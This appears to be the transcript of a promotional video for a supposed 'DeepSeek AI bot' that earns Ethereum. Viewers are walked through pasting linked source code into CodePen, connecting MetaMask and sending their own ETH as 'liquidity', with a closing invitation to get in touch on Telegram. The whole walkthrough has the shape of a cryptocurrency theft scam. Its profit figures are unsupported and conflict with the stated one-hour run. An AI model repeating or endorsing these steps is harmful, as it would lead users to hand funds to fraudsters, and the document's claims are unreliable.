Hello guys. Today I'm excited to share a straightforward method to earn Ethereum using DeepSeek AI bot. This method involves automatically processing transactions on the Ethereum blockchain and collecting profits from transaction fees. I've written a script to automate this process. Let's dive into the details. Step 1. Set up MetaMask wallet. We need to transfer our liquidity and profits through MetaMask, so you need to set up your MetaMask wallet. If you don't have one, you can download and install it on your browser for free. Step 2. Open the source code on CodePen. You can find the source code and the CodePen site through the link in the description. Copy the source code and enter the CodePen website. Paste it in HTML section. As you can see, the bot is open, and next, step 3. Connect MetaMask wallet. Click on the Connect MetaMask button to establish the connection between our source code and MetaMask. And then deploy a contract for the bot. Click on the Deploy Contract button to create a smart contract. Step 4. Attach your second wallet address to smart contract. Open your MetaMask and click on the top account 1. Follow the process to create a new Ethereum account. You can name it account 2. Next, copy the address of the new account and paste it into the bot. Click the Attach button. Wait until address attached successfully. Now you can see my liquidity amount in your account 1. Click on the Confirm Send Ethereum button and confirm the liquidity transfer. The transfer should take around 10 to 60 seconds to complete. Okay, now the transaction is done. You can see the hash ID here and the confirmed transaction page in MetaMask. Let's close the extension. Then what's showing now is the mining page of the bot. Down here is the successful attempts, failed attempts, also withdrawal histories. Step 5. Start the mining. Let's start the mining process. Click on Start Mining button. You can see your liquidity amount and total attempts are moving up. Here you can see your total profit. And down here is the successful or failed attempts histories. Now let's check my second MetaMask wallet. As you can see, the Ethereum amount is transferred from my account 1 to account 2. It's also showing on the amount of my liquidity. I will now speed up the video for a while, and once the mining process is completed, I will show the results. Alright, I've been mining for about an hour now. Let's stop mining and withdraw my funds. Click on the Pause Mining button and go to your MetaMask wallet account 1. Copy the address and paste it in the Withdraw section. Check again whether the address is correct, click the Withdraw button, and wait for the prompt for successful withdrawal. Okay, now withdraw successfully. Let's check the amount in MetaMask wallet. Account 1 is the profits that you did withdraw. Account 2 is the amount that you sent from account 1. And down here is the withdrawal history. Okay, let's summarize the profits I got this time. 15 minutes results. I made $423. With liquidity, $2,105. In the end, I had $2,528. If you have more liquid funds, you can get higher profits. Okay guys, thank you for watching my video. I hope my video can be helpful to you. Please like and subscribe to my channel. If you have any questions, you can also contact my Telegram.